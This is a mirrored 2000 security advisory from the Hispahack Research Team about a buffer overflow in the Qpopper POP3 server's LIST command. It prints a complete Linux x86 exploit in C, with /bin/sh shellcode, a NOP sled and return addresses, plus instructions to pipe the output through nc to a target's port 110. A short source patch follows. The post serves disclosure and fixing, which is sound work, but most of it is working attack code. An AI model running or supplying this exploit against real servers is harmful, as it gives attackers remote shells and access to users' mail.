The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Qpopper security bug


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Wed, 26 Jan 2000 14:55:11 +0100
From: Zhodiac <[email protected]>
To: [email protected]
Subject: Qpopper security bug

 !Hispahack Research Team
 http://hispahack.ccc.de

 Program: Qpopper <= 3.0beta29 (2.53 and olders are not vulnerable)
 Platform: *nix
 Risk: Remote access
 Author: Zhodiac <[email protected]>
 Date: 20/1/2000


 - Problem:
 ===========

    The, nowadays, so common qpop pop3 server is one of the best server
 which implements some features added not in normal pop3d. Like almost all
 software it has some security bugs. In this case, once you pass the
 login process you can execute malicious code due to a buffer overflow.

    With this buffer overflow (second argument of the LIST command) you
 can execute malicious code with the uid of the user you logged in, and
 with gid mail. Due to have gid mail, in some systems you can read all the
 mail of other users and even change/delete it.


 - Exploit:
 ==========

     For proof of vulnerability we release the Linux x86 xploit. But be
 aware, no public xploit for your system does not mean you can't be
 hacked. Vulnerability exists, fix it!

------- qpop-xploit.c ----------

/*
 * !Hispahack Research Team
 * http://hispahack.ccc.de
 *
 * By Zhodiac <[email protected]>
 *
 * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
 * Overflow at pop_list()->pop_msg()
 *
 * Tested: 3.0beta28  offset=0
 *         3.0beta26  offset=0
 *         3.0beta25  offset=0
 *
 * #include <standar/disclaimer.h>
 *
 * This code is dedicated to my love [CrAsH]] and to all the people who
 * were raided in Spain in the last few days.
 *
 * Madrid 10/1/2000
 *
 */

#include <stdio.h>

#define BUFFERSIZE 1004
#define NOP 0x90
#define OFFSET 0xbfffd9c4

char shellcode[]=
 "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
 "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
 "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";


void usage(char *progname) {
 fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname);
 exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE];
unsigned long *long_ptr,offset=OFFSET;
int aux;

 fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
 fprintf(stderr,"Qpopper xploit by Zhodiac <[email protected]>\n\n");

 if (argc<3) usage(argv[0]);

 if (argc==4) offset+=atol(argv[3]);

 ptr=buffer;
 memset(ptr,0,sizeof(buffer));
 memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
 ptr+=sizeof(buffer)-strlen(shellcode)-16;
 memcpy(ptr,shellcode,strlen(shellcode));
 ptr+=strlen(shellcode);
 long_ptr=(unsigned long*)ptr;
 for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
 ptr=(char *)long_ptr;
 *ptr='\0';

 fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
 fprintf(stderr,"Offset: 0x%lx\n\n",offset);

 printf("USER %s\n",argv[1]);
 sleep(1);
 printf("PASS %s\n",argv[2]);
 sleep(1);
 printf("LIST 1 %s\n",buffer);
 sleep(1);
 printf("uname -a; id\n");

 return(0);
}

------- qpop-xploit.c ---------


 - Fix:
 ======

   Best solution is to wait for a new patched version, meanwhile here you
 have a patch that will stop this attack (be aware that this patch was not
 done after a total revision of the code, maybe there are some other
 overflows).

------ pop_list.patch ---------

77c77
<               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s",
---
>               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",

------ pop_list.patch ---------

 piscis:~# patch pop_list.c pop_list.patch
 piscis:~#

 Spain r0x

 Greets :)

 Zhodiac

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру